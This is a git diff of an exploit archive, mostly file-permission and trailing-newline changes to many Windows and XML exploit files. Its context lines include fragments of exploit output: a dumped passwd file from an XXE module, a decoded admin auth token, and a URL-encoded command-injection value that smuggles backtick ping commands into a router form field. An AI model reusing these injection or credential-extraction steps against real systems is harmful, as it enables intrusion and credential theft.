diff --git a/platforms/windows/shellcode/15116.cpp b/platforms/windows/shellcode/15116.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/15136.cpp b/platforms/windows/shellcode/15136.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/17323.c b/platforms/windows/shellcode/17323.c old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/22489.cpp b/platforms/windows/shellcode/22489.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/24318.c b/platforms/windows/shellcode/24318.c old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/28996.c b/platforms/windows/shellcode/28996.c old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/33836.txt b/platforms/windows/shellcode/33836.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/39731.c b/platforms/windows/shellcode/39731.c old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/39794.c b/platforms/windows/shellcode/39794.c old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/39979.c b/platforms/windows/shellcode/39979.c old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/42016.asm b/platforms/windows/shellcode/42016.asm old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/10225.txt b/platforms/windows/webapps/10225.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/10331.txt b/platforms/windows/webapps/10331.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/10376.txt b/platforms/windows/webapps/10376.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/10428.txt b/platforms/windows/webapps/10428.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/10513.txt b/platforms/windows/webapps/10513.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/10514.txt b/platforms/windows/webapps/10514.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/10649.html b/platforms/windows/webapps/10649.html old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/11215.txt b/platforms/windows/webapps/11215.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/11243.txt b/platforms/windows/webapps/11243.txt old mode 100755 new mode 100644 index 0538e41aa..7c7d2a7b9 --- a/platforms/windows/webapps/11243.txt +++ b/platforms/windows/webapps/11243.txt @@ -21,5 +21,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... - \ No newline at end of file +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/platforms/windows/webapps/11330.txt b/platforms/windows/webapps/11330.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/11406.txt b/platforms/windows/webapps/11406.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/11847.txt b/platforms/windows/webapps/11847.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/12450.txt b/platforms/windows/webapps/12450.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/12640.txt b/platforms/windows/webapps/12640.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/12679.txt b/platforms/windows/webapps/12679.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/12680.txt b/platforms/windows/webapps/12680.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/12728.txt b/platforms/windows/webapps/12728.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/12750.txt b/platforms/windows/webapps/12750.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/12786.txt b/platforms/windows/webapps/12786.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/14115.txt b/platforms/windows/webapps/14115.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/14285.txt b/platforms/windows/webapps/14285.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/14355.txt b/platforms/windows/webapps/14355.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/14382.txt b/platforms/windows/webapps/14382.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/14427.txt b/platforms/windows/webapps/14427.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/14547.txt b/platforms/windows/webapps/14547.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/14932.py b/platforms/windows/webapps/14932.py index 063270168..7f35fbc11 100755 --- a/platforms/windows/webapps/14932.py +++ b/platforms/windows/webapps/14932.py @@ -119,4 +119,4 @@ if __name__ == "__main__": getResp = getRequest(basicSploit(basicInfo[key])) if re.findall("the nvarchar value '", getResp): dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type int')[0] - print "\n(!) Found database %s%s" % (key, dbInfo.rstrip()) \ No newline at end of file + print "\n(!) Found database %s%s" % (key, dbInfo.rstrip()) \ No newline at end of file diff --git a/platforms/windows/webapps/14933.txt b/platforms/windows/webapps/14933.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/14934.txt b/platforms/windows/webapps/14934.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/15144.txt b/platforms/windows/webapps/15144.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/16054.txt b/platforms/windows/webapps/16054.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/17026.txt b/platforms/windows/webapps/17026.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/17276.txt b/platforms/windows/webapps/17276.txt old mode 100755 new mode 100644 index 9d60b1112..7025749ca --- a/platforms/windows/webapps/17276.txt +++ b/platforms/windows/webapps/17276.txt @@ -166,4 +166,4 @@ Core Security's software solutions build on over a decade of trusted research an The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. PGP/GPG Keys -This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. \ No newline at end of file +This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. \ No newline at end of file diff --git a/platforms/windows/webapps/17360.txt b/platforms/windows/webapps/17360.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/17382.txt b/platforms/windows/webapps/17382.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/17388.txt b/platforms/windows/webapps/17388.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/17766.txt b/platforms/windows/webapps/17766.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/17840.txt b/platforms/windows/webapps/17840.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/17873.txt b/platforms/windows/webapps/17873.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/18005.txt b/platforms/windows/webapps/18005.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/18077.txt b/platforms/windows/webapps/18077.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/18451.txt b/platforms/windows/webapps/18451.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/18510.txt b/platforms/windows/webapps/18510.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/18567.txt b/platforms/windows/webapps/18567.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/18603.txt b/platforms/windows/webapps/18603.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/18605.txt b/platforms/windows/webapps/18605.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/18764.txt b/platforms/windows/webapps/18764.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/18766.txt b/platforms/windows/webapps/18766.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/18982.txt b/platforms/windows/webapps/18982.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/19321.txt b/platforms/windows/webapps/19321.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/19339.txt b/platforms/windows/webapps/19339.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/19455.txt b/platforms/windows/webapps/19455.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/19525.txt b/platforms/windows/webapps/19525.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/20011.js b/platforms/windows/webapps/20011.js old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/20063.txt b/platforms/windows/webapps/20063.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/20124.txt b/platforms/windows/webapps/20124.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/20320.txt b/platforms/windows/webapps/20320.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/20477.txt b/platforms/windows/webapps/20477.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/20478.txt b/platforms/windows/webapps/20478.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/20545.txt b/platforms/windows/webapps/20545.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/20575.txt b/platforms/windows/webapps/20575.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/20643.txt b/platforms/windows/webapps/20643.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/20677.txt b/platforms/windows/webapps/20677.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/21392.txt b/platforms/windows/webapps/21392.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/21394.txt b/platforms/windows/webapps/21394.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/21744.txt b/platforms/windows/webapps/21744.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/22879.txt b/platforms/windows/webapps/22879.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/22972.txt b/platforms/windows/webapps/22972.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/23132.py b/platforms/windows/webapps/23132.py index 10af74a44..3e2d679f3 100755 --- a/platforms/windows/webapps/23132.py +++ b/platforms/windows/webapps/23132.py @@ -80,5 +80,4 @@ def MakePath(f, count): return a + f if __name__ == "__main__": - main() - \ No newline at end of file + main() \ No newline at end of file diff --git a/platforms/windows/webapps/23184.txt b/platforms/windows/webapps/23184.txt old mode 100755 new mode 100644 index ab7d58202..9384c5582 --- a/platforms/windows/webapps/23184.txt +++ b/platforms/windows/webapps/23184.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8700/info A problem with the storage of user credentials has been identified in Software602 602Pro LAN SUITE 2003. Because of this, an attacker may be able to gain access to potentially sensitive information. -http://www.example.com/mail/S030904L.LOG \ No newline at end of file +http://www.example.com/mail/S030904L.LOG \ No newline at end of file diff --git a/platforms/windows/webapps/23324.txt b/platforms/windows/webapps/23324.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/23875.txt b/platforms/windows/webapps/23875.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/23886.txt b/platforms/windows/webapps/23886.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/24432.txt b/platforms/windows/webapps/24432.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/24496.txt b/platforms/windows/webapps/24496.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/24500.txt b/platforms/windows/webapps/24500.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/24534.txt b/platforms/windows/webapps/24534.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/24535.txt b/platforms/windows/webapps/24535.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/24901.txt b/platforms/windows/webapps/24901.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/24964.txt b/platforms/windows/webapps/24964.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/26807.txt b/platforms/windows/webapps/26807.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/26956.txt b/platforms/windows/webapps/26956.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/26957.txt b/platforms/windows/webapps/26957.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/27291.txt b/platforms/windows/webapps/27291.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/27406.txt b/platforms/windows/webapps/27406.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/27755.txt b/platforms/windows/webapps/27755.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/27777.txt b/platforms/windows/webapps/27777.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/28238.txt b/platforms/windows/webapps/28238.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/29292.txt b/platforms/windows/webapps/29292.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/30669.txt b/platforms/windows/webapps/30669.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/31221.txt b/platforms/windows/webapps/31221.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/31423.txt b/platforms/windows/webapps/31423.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/31578.txt b/platforms/windows/webapps/31578.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/31579.txt b/platforms/windows/webapps/31579.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/31760.txt b/platforms/windows/webapps/31760.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/31992.txt b/platforms/windows/webapps/31992.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/31993.txt b/platforms/windows/webapps/31993.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/31994.txt b/platforms/windows/webapps/31994.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/31995.txt b/platforms/windows/webapps/31995.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/33330.txt b/platforms/windows/webapps/33330.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/33434.rb b/platforms/windows/webapps/33434.rb index 8627d810c..8034db0cf 100755 --- a/platforms/windows/webapps/33434.rb +++ b/platforms/windows/webapps/33434.rb @@ -295,4 +295,4 @@ gdm:x:42:42::/var/lib/gdm:/sbin/nologin avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin fdsa:x:501:501::/home/fdsa:/bin/bash [*] Auxiliary module execution completed -msf auxiliary(hp_release_control_xxe) > \ No newline at end of file +msf auxiliary(hp_release_control_xxe) > \ No newline at end of file diff --git a/platforms/windows/webapps/33633.txt b/platforms/windows/webapps/33633.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/34527.c b/platforms/windows/webapps/34527.c old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/34852.txt b/platforms/windows/webapps/34852.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/34924.txt b/platforms/windows/webapps/34924.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/35529.txt b/platforms/windows/webapps/35529.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/35593.txt b/platforms/windows/webapps/35593.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/35982.txt b/platforms/windows/webapps/35982.txt old mode 100755 new mode 100644 index f75cbed13..4d9f7facc --- a/platforms/windows/webapps/35982.txt +++ b/platforms/windows/webapps/35982.txt @@ -119,4 +119,4 @@ Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) -info@mogwaisecurity.de \ No newline at end of file +info@mogwaisecurity.de \ No newline at end of file diff --git a/platforms/windows/webapps/36262.txt b/platforms/windows/webapps/36262.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/36861.txt b/platforms/windows/webapps/36861.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/36960.txt b/platforms/windows/webapps/36960.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/37059.html b/platforms/windows/webapps/37059.html old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/37319.html b/platforms/windows/webapps/37319.html old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/37320.html b/platforms/windows/webapps/37320.html old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/37395.txt b/platforms/windows/webapps/37395.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/37621.txt b/platforms/windows/webapps/37621.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/38379.txt b/platforms/windows/webapps/38379.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/38380.txt b/platforms/windows/webapps/38380.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/38602.txt b/platforms/windows/webapps/38602.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/38762.txt b/platforms/windows/webapps/38762.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/39477.txt b/platforms/windows/webapps/39477.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/39486.txt b/platforms/windows/webapps/39486.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/39573.txt b/platforms/windows/webapps/39573.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/39808.txt b/platforms/windows/webapps/39808.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/39968.txt b/platforms/windows/webapps/39968.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/40106.txt b/platforms/windows/webapps/40106.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/40742.txt b/platforms/windows/webapps/40742.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/41309.html b/platforms/windows/webapps/41309.html old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/41310.html b/platforms/windows/webapps/41310.html old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/41311.txt b/platforms/windows/webapps/41311.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/41395.txt b/platforms/windows/webapps/41395.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/42091.txt b/platforms/windows/webapps/42091.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/42117.txt b/platforms/windows/webapps/42117.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/42118.txt b/platforms/windows/webapps/42118.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/42120.txt b/platforms/windows/webapps/42120.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/42311.txt b/platforms/windows/webapps/42311.txt old mode 100755 new mode 100644 index 4337fe99c..8f8c7e358 --- a/platforms/windows/webapps/42311.txt +++ b/platforms/windows/webapps/42311.txt @@ -145,4 +145,4 @@ timer=timer.drv [mci] Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds. -bash-4.4$ \ No newline at end of file +bash-4.4$ \ No newline at end of file diff --git a/platforms/windows/webapps/42312.txt b/platforms/windows/webapps/42312.txt old mode 100755 new mode 100644 index a79642106..7485213ab --- a/platforms/windows/webapps/42312.txt +++ b/platforms/windows/webapps/42312.txt @@ -77,4 +77,4 @@ bash-4.4$ cat pelco_auth_token.txt ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5 bash-4.4$ base64 -D pelco_auth_token.txt |base64 -D - {"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"} -bash-4.4$ \ No newline at end of file +bash-4.4$ \ No newline at end of file diff --git a/platforms/windows/webapps/42444.txt b/platforms/windows/webapps/42444.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/42453.txt b/platforms/windows/webapps/42453.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/42699.rb b/platforms/windows/webapps/42699.rb index dbbd6b285..fa6f06313 100755 --- a/platforms/windows/webapps/42699.rb +++ b/platforms/windows/webapps/42699.rb @@ -56,4 +56,4 @@ class MetasploitModule < Msf::Auxiliary end end -end +end \ No newline at end of file diff --git a/platforms/windows/webapps/42705.rb b/platforms/windows/webapps/42705.rb index e000bb02b..4ef438906 100755 --- a/platforms/windows/webapps/42705.rb +++ b/platforms/windows/webapps/42705.rb @@ -64,4 +64,4 @@ class MetasploitModule < Msf::Auxiliary end end -end +end \ No newline at end of file diff --git a/platforms/windows/webapps/42706.rb b/platforms/windows/webapps/42706.rb index 6d5dfb7f9..1e7d6a469 100755 --- a/platforms/windows/webapps/42706.rb +++ b/platforms/windows/webapps/42706.rb @@ -54,4 +54,4 @@ class MetasploitModule < Msf::Auxiliary end end -end +end \ No newline at end of file diff --git a/platforms/windows/webapps/42707.txt b/platforms/windows/webapps/42707.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/42892.txt b/platforms/windows/webapps/42892.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/42953.txt b/platforms/windows/webapps/42953.txt old mode 100755 new mode 100644 index 215e1777a..54c42fcf6 --- a/platforms/windows/webapps/42953.txt +++ b/platforms/windows/webapps/42953.txt @@ -19,4 +19,4 @@ This JSP could then be requested and any code it contained would be executed by <% out.println("hello");%> -It is the bypass for CVE-2017-12615 +It is the bypass for CVE-2017-12615 \ No newline at end of file diff --git a/platforms/windows/webapps/43018.html b/platforms/windows/webapps/43018.html old mode 100755 new mode 100644 index 64d9ca30c..88e2de469 --- a/platforms/windows/webapps/43018.html +++ b/platforms/windows/webapps/43018.html @@ -80,4 +80,4 @@ Vulnerability Timeline: 18th August 2017 – Vulnerability Discovered 20th August 2017 – Contacted Vendor – No Response 1st September 2017 – Contacted Vendor again – No Response -18th September 2017 – Vulnerability Disclosed +18th September 2017 – Vulnerability Disclosed \ No newline at end of file diff --git a/platforms/windows/webapps/43019.txt b/platforms/windows/webapps/43019.txt old mode 100755 new mode 100644 index 96757c633..e52a3e473 --- a/platforms/windows/webapps/43019.txt +++ b/platforms/windows/webapps/43019.txt @@ -50,4 +50,4 @@ Vulnerability Timeline: 18th August 2017 – Vulnerability Discovered 20th August 2017 – Contacted Vendor – No Response 1st September 2017 – Contacted Vendor again – No Response -18th September 2017 – Vulnerability Disclosed +18th September 2017 – Vulnerability Disclosed \ No newline at end of file diff --git a/platforms/windows/webapps/43129.txt b/platforms/windows/webapps/43129.txt old mode 100755 new mode 100644 index bcd13e620..e0cd0c556 --- a/platforms/windows/webapps/43129.txt +++ b/platforms/windows/webapps/43129.txt @@ -52,4 +52,4 @@ Content-Length: 101 Cookie: JSESSIONID_APM_9090=68C19C45D63C6FD102EB3DF25A8CE39D; testcookie=; am_username=; am_check=; am_mgview=availability Connection: close -method=getLatestStatusForJIT&haid=10000106&viewid=1&currentime=1509869908111&resourceIDs=(0000106,0) +method=getLatestStatusForJIT&haid=10000106&viewid=1&currentime=1509869908111&resourceIDs=(0000106,0) \ No newline at end of file diff --git a/platforms/windows/webapps/9873.txt b/platforms/windows/webapps/9873.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/webapps/9885.txt b/platforms/windows/webapps/9885.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/dos/37685.txt b/platforms/xml/dos/37685.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/local/39438.txt b/platforms/xml/local/39438.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/35275.txt b/platforms/xml/webapps/35275.txt old mode 100755 new mode 100644 index baf0385a6..e3edad94b --- a/platforms/xml/webapps/35275.txt +++ b/platforms/xml/webapps/35275.txt @@ -121,4 +121,4 @@ Domain: www.bga.com.tr Social: twitter.com/bgasecurity Contact: bilgi@bga.com.tr -Copyright © 2014 | BGA \ No newline at end of file +Copyright © 2014 | BGA \ No newline at end of file diff --git a/platforms/xml/webapps/36132.txt b/platforms/xml/webapps/36132.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/36369.txt b/platforms/xml/webapps/36369.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/36441.txt b/platforms/xml/webapps/36441.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/36941.txt b/platforms/xml/webapps/36941.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/37250.txt b/platforms/xml/webapps/37250.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/37609.txt b/platforms/xml/webapps/37609.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/37891.txt b/platforms/xml/webapps/37891.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/38118.txt b/platforms/xml/webapps/38118.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/38261.txt b/platforms/xml/webapps/38261.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/38897.txt b/platforms/xml/webapps/38897.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/38898.txt b/platforms/xml/webapps/38898.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/38899.txt b/platforms/xml/webapps/38899.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/39170.txt b/platforms/xml/webapps/39170.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/39840.txt b/platforms/xml/webapps/39840.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/39841.txt b/platforms/xml/webapps/39841.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/40077.txt b/platforms/xml/webapps/40077.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/40109.txt b/platforms/xml/webapps/40109.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/40501.txt b/platforms/xml/webapps/40501.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/40590.txt b/platforms/xml/webapps/40590.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/40816.txt b/platforms/xml/webapps/40816.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/41482.txt b/platforms/xml/webapps/41482.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/41574.html b/platforms/xml/webapps/41574.html old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/41579.html b/platforms/xml/webapps/41579.html old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/41855.sh b/platforms/xml/webapps/41855.sh index 8b8a380f2..9873f0496 100755 --- a/platforms/xml/webapps/41855.sh +++ b/platforms/xml/webapps/41855.sh @@ -224,4 +224,4 @@ do done -ExitCleanup 0 +ExitCleanup 0 \ No newline at end of file diff --git a/platforms/xml/webapps/41925.txt b/platforms/xml/webapps/41925.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/42028.txt b/platforms/xml/webapps/42028.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/42029.txt b/platforms/xml/webapps/42029.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/42036.txt b/platforms/xml/webapps/42036.txt old mode 100755 new mode 100644 diff --git a/platforms/xml/webapps/42089.txt b/platforms/xml/webapps/42089.txt old mode 100755 new mode 100644 index 1d8737f4e..3667a9d0d --- a/platforms/xml/webapps/42089.txt +++ b/platforms/xml/webapps/42089.txt @@ -121,5 +121,4 @@ Proof of Concept: 14 oldport=&netid=192.168.1.0%7c%7c%60ping%20­ 15 c%2021%20127.0.0.1%60%20%23'%7c%7c%60ping%20­ 16 c%2021%20127.0.0.1%60%20%23%5c%22%20&netmask=255.255.255.0&router=192.168.1.1&inte -17 rface_vlanid_sel=eth1 - \ No newline at end of file +17 rface_vlanid_sel=eth1 \ No newline at end of file diff --git a/platforms/xml/webapps/42517.txt b/platforms/xml/webapps/42517.txt old mode 100755 new mode 100644 index 8f02f125c..ceaebd276 --- a/platforms/xml/webapps/42517.txt +++ b/platforms/xml/webapps/42517.txt @@ -154,4 +154,4 @@ Locally Exploitable: No The contents of this advisory are copyright (c) 2017 VVVSecurity and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 4.0 - License: http://creativecommons.org/licenses/by-nc-sa/4.0/ <http://creativecommons.org/licenses/by-nc-sa/4.0/> \ No newline at end of file + License: http://creativecommons.org/licenses/by-nc-sa/4.0/ <http://creativecommons.org/licenses/by-nc-sa/4.0/> \ No newline at end of file diff --git a/platforms/xml/webapps/43009.txt b/platforms/xml/webapps/43009.txt old mode 100755 new mode 100644 index 6b11722e2..220674753 --- a/platforms/xml/webapps/43009.txt +++ b/platforms/xml/webapps/43009.txt @@ -183,4 +183,4 @@ All these vulnerabilities were tested on the latest version of Apache Solr with These vulnerabilities were discovered by: Michael Stepankin (JPMorgan Chase) -Olga Barinova (Gotham Digital Science) +Olga Barinova (Gotham Digital Science) \ No newline at end of file diff --git a/platforms/xml/webapps/43113.txt b/platforms/xml/webapps/43113.txt old mode 100755 new mode 100644